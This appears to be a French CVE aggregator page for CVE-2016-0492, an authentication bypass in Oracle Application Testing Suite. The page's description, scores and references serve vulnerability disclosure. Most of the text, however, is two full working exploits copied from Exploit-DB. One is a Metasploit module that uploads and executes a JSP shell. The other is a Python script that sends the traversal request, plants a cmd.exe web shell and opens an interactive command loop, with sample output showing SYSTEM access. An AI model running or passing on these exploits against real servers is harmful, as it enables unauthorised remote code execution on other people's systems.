CVE-2016-0492 : Détail

CVE-2016-0492

91.46%V4
Network
2016-01-21
01h00 +00:00
2016-12-05
13h57 +00:00
CVE.org
NVD
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Unspecified vulnerability in the Oracle Application Testing Suite component in Oracle Enterprise Manager Grid Control 12.4.0.2 and 12.5.0.2 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Load Testing for Web Apps, a different vulnerability than CVE-2016-0488. NOTE: the previous information is from the January 2016 CPU. Oracle has not commented on third-party claims that this is a directory traversal vulnerability in the isAllowedUrl function, which allows remote attackers to bypass authentication via directory traversal sequences following a URI entry that does not require authentication, as demonstrated by olt/Login.do/../../olt/UploadFileUpload.do.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE Other No informations.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 6.4 AV:N/AC:L/Au:N/C:P/I:P/A:N nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
EPSS First.org

Informations sur l'Exploit

Exploit Database EDB-ID : 39852

Date de publication : 2016-05-24 22h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Oracle ATS Arbitrary File Upload', 'Description' => %q{ This module exploits an authentication bypass and arbitrary file upload in Oracle Application Testing Suite (OATS), version 12.4.0.2.0 and unknown earlier versions, to upload and execute a JSP shell. }, 'Author' => [ 'Zhou Yu', # Proof of concept 'wvu' # Metasploit module ], 'References' => [ %w{CVE 2016-0492}, # Auth bypass %w{CVE 2016-0491}, # File upload %w{EDB 39691} # PoC ], 'DisclosureDate' => 'Jan 20 2016', 'License' => MSF_LICENSE, 'Platform' => %w{win linux}, 'Arch' => ARCH_JAVA, 'Privileged' => true, 'Targets' => [ ['OATS <= 12.4.0.2.0 (Windows)', 'Platform' => 'win'], ['OATS <= 12.4.0.2.0 (Linux)', 'Platform' => 'linux'] ], 'DefaultTarget' => 0 )) register_options([ Opt::RPORT(8088) ]) end def check res = send_request_cgi( 'method' => 'GET', 'uri' => '/admin/Login.do' ) if res && res.body.include?('12.4.0.2.0') CheckCode::Appears else CheckCode::Safe end end def exploit print_status("Uploading JSP shell to #{jsp_path}") upload_jsp_shell print_status("Executing JSP shell: #{full_uri}olt/pages/#{jsp_filename}") exec_jsp_shell end def upload_jsp_shell mime = Rex::MIME::Message.new mime.add_part('.jsp', nil, nil, 'form-data; name="storage.extension"') mime.add_part(jsp_filename, nil, nil, 'form-data; name="fileName1"') mime.add_part('', nil, nil, 'form-data; name="fileName2"') # Not needed mime.add_part('', nil, nil, 'form-data; name="fileName3"') # Not needed mime.add_part('', nil, nil, 'form-data; name="fileName4"') # Not needed mime.add_part('*', nil, nil, 'form-data; name="fileType"') mime.add_part(payload.encoded, 'text/plain', nil, %Q{form-data; name="file1"; filename="#{jsp_filename}"}) mime.add_part('Default', nil, nil, 'form-data; name="storage.repository"') mime.add_part('.', nil, nil, 'form-data; name="storage.workspace"') mime.add_part(jsp_directory, nil, nil, 'form-data; name="directory"') register_files_for_cleanup(jsp_path) send_request_cgi( 'method' => 'POST', 'uri' => '/olt/Login.do/../../olt/UploadFileUpload.do', 'ctype' => "multipart/form-data; boundary=#{mime.bound}", 'data' => mime.to_s ) end def exec_jsp_shell send_request_cgi( 'method' => 'GET', 'uri' => "/olt/pages/#{jsp_filename}" ) end def jsp_directory case target['Platform'] when 'win' '..\\oats\\servers\\AdminServer\\tmp\\_WL_user\\oats_ee\\1ryhnd\\war\\pages' when 'linux' '../oats/servers/AdminServer/tmp/_WL_user/oats_ee/1ryhnd/war/pages' end end def jsp_filename @jsp_filename ||= Rex::Text.rand_text_alpha(8) + '.jsp' end def jsp_path jsp_directory + "#{target['Platform'] == 'win' ? '\\' : '/'}" + jsp_filename end end
Exploit Database EDB-ID : 39691

Date de publication : 2016-04-12 22h00 +00:00
Auteur : Zhou Yu
EDB Vérifié : Yes

# Exploit Title: Oracle Application Testing Suite Authentication Bypass and Arbitrary File Upload Remote Exploit # Exploit Author: Zhou Yu <504137480@qq.com > # Vendor Homepage: http://www.oracle.com/ # Software Link: http://www.oracle.com/technetwork/oem/downloads/apptesting-downloads-1983826.html?ssSourceSiteId=otncn # Version: 12.4.0.2.0 # Tested on: Win7 SP1 32-bit # CVE : CVE-2016-0492 and CVE-2016-0491 import urllib2 import urllib ip = '192.168.150.239' port = 8088 url = "http://" + ip + ":" + str(port) #bypass authentication url = url+"/olt/Login.do/../../olt/UploadFileUpload.do" request = urllib2.Request(url) webshell_content=''' <%@ page import="java.util.*,java.io.*" %> <% if (request.getParameter("{cmd}") != null) {{ Process p = Runtime.getRuntime().exec("cmd.exe /c " + request.getParameter("{cmd}")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while (disr != null) {{ out.println(disr); disr = dis.readLine(); }} }} %> ''' boundary = "---------------------------7e01e2240a1e" request.add_header('Content-Type', "multipart/form-data; boundary=" + boundary) post_data = "--" + boundary + "\r\n" post_data = post_data + "Content-Disposition: form-data; name=\"storage.extension\"\r\n" post_data = post_data + "\r\n.jsp\r\n" post_data = post_data + "--" + boundary + "\r\n" post_data = post_data + "Content-Disposition: form-data; name=\"fileName1\"\r\n" post_data = post_data + "\r\nwebshell.jsp\r\n" post_data = post_data + "--" + boundary + "\r\n" post_data = post_data + "Content-Disposition: form-data; name=\"fileName2\"\r\n" post_data = post_data + "\r\n\r\n" post_data = post_data + "--" + boundary + "\r\n" post_data = post_data + "Content-Disposition: form-data; name=\"fileName3\"\r\n" post_data = post_data + "\r\n\r\n" post_data = post_data + "--" + boundary + "\r\n" post_data = post_data + "Content-Disposition: form-data; name=\"fileName4\"\r\n" post_data = post_data + "\r\n\r\n" post_data = post_data + "--" + boundary + "\r\n" post_data = post_data + "Content-Disposition: form-data; name=\"fileType\"\r\n" post_data = post_data + "\r\n*\r\n" post_data = post_data + "--" + boundary + "\r\n" post_data = post_data + "Content-Disposition: form-data; name=\"file1\"; filename=\"webshell.jsp\"\r\n" post_data = post_data + "Content-Type: text/plain\r\n" post_data = post_data + "\r\n" + webshell_content +"\r\n" post_data = post_data + "--" + boundary + "\r\n" post_data = post_data + "Content-Disposition: form-data; name=\"storage.repository\"\r\n" post_data = post_data + "\r\nDefault\r\n" post_data = post_data + "--" + boundary + "\r\n" post_data = post_data + "Content-Disposition: form-data; name=\"storage.workspace\"\r\n" post_data = post_data + "\r\n.\r\n" post_data = post_data + "--" + boundary + "\r\n" post_data = post_data + "Content-Disposition: form-data; name=\"directory\"\r\n" post_data = post_data + "\r\n" + "../oats\servers\AdminServer\\tmp\_WL_user\oats_ee\\1ryhnd\war\pages" +"\r\n" post_data = post_data + "--" + boundary + "--"+"\r\n" try: request.add_data(post_data) response = urllib2.urlopen(request) if response.code == 200 : print "[+]upload done!" webshellurl = "http://" + ip + ":" + str(port) + "/olt/pages/webshell.jsp" print "[+]wait a moment,detecting whether the webshell exists..." if urllib2.urlopen(webshellurl).code == 200 : print "[+]upload webshell successfully!" print "[+]return a cmd shell" while True: cmd = raw_input(">>: ") if cmd == "exit" : break print urllib.urlopen(webshellurl+"?{cmd}=" + cmd).read().lstrip() else: print "[-]attack fail!" else: print "[-]attack fail!" except Exception as e: print "[-]attack fail!" ''' #run the exploit and get a cmd shell root@kali:~/Desktop# python exploit.py [+]upload done! [+]wait a moment,detecting whether the webshell exists... [+]upload webshell successfully! [+]return a cmd shell >>: whoami nt authority\system >>: exit '''

Products Mentioned

Configuraton 0

Oracle>>Application_testing_suite >> Version 12.4.0.2

Oracle>>Application_testing_suite >> Version 12.5.0.2

Références

https://www.exploit-db.com/exploits/39852/
Tags : exploit, x_refsource_EXPLOIT-DB
https://www.exploit-db.com/exploits/39691/
Tags : exploit, x_refsource_EXPLOIT-DB
http://www.securitytracker.com/id/1034734
Tags : vdb-entry, x_refsource_SECTRACK
http://www.securityfocus.com/bid/81158
Tags : vdb-entry, x_refsource_BID
Les informations affichées sur CVE Find proviennent de plusieurs sources de référence rigoureusement sélectionnées. Les données CVE sont fournies par MITRE Corporation et la National Vulnerability Database (NVD). Le catalogue des vulnérabilités activement exploitées (KEV) provient de la Cybersecurity and Infrastructure Security Agency (CISA), tandis que les scores EPSS sont issus de FIRST.org. Enfin, les données relatives aux faiblesses logicielles (CWE) et aux schémas d'attaque courants (CAPEC) sont maintenues par MITRE Corporation, et les informations sur les configurations logicielles et matérielles (CPE) proviennent du NVD.